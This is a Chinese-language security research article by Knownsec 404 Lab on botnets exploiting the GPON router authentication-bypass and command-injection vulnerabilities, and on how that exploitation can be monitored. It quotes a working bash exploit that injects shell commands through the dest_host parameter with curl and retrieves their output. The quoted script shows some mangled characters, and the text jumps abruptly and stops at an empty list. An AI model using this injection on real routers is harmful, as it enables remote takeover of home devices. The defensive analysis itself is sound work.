作者:知道創宇404實驗室
日期:2018/05/10
2018/05/07,
ZoomEye Dork(文末有彩蛋)中heige吟詩一首(作者:卞之琳):
斷章
你在橋上看風景,
看風景人在樓上看你。
明月裝飾了你的窗子,
你裝飾了別人的夢。
殊不知在GPON Home Gateway遠程命令執行漏洞被利用的過程中亦是如此。
0x00前言
一. 漏洞詳情
2018/04/30,vpnMentor公布了 GPON 路由器的高危漏洞:驗證繞過漏洞(CVE-2018-10561)和命令注入漏洞(CVE-2018-10562)。由於只需要發送一個請求,就可以在 GPON路由器 上執行任意命令,所以在上一篇文章《GPON Home Gateway 遠程命令執行漏洞分析》,我們給出了殭屍網絡的相關預警。
結合ZoomEye網絡空間搜索引擎以及對漏洞原理的詳細研究,我們對GPON Home Gateway遠程命令執行漏洞被利用情況進行了深入的研究,意外地發現利用該漏洞的殭屍網絡是可以被監控的。
短短的四天時間內,這片路由器的戰場,競爭、撤退、消亡時時刻刻都在上演,在每一個路由器的背後,每天都有着多個不同的惡意控制者,故事精彩得難以想象。
二. 檢測原理
漏洞發現者給出的利用腳本如下:
1 #!/bin/bash 2 3 echo “[+] Sending the Command… “ 4 # We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices 5 curl -k -d “XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=/`$2/`;$2&ipv=0” $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null 6 echo “[+] Waiting….” 7 sleep 3 8 echo “[+] Retrieving the ouput….” 9 curl -k $1/diag.html?images/ 2>/dev/null | grep ‘diag_result = ‘ | sed -e ‘s///n//n/g’
該腳本邏輯如下:
步驟1(行5):將注入的命令發送至/GponForm/diag_Form並被執行。
步驟2(行9):利用繞過漏洞訪問diag.html頁面獲取命令執行的結果。
關鍵點在第二步:
當我們不使用grep diag_result去過濾返回的結果,將會發現部分路由器會將diag_host也一併返回。而參數diag_host就是步驟1中注入的命令。
但該樣本和源碼依然有很多地方不同:
- 對外掃描的IP段不同,樣本中對外掃描的IP段如下:
該樣本在對外掃描時,只會掃描表格中的這些IP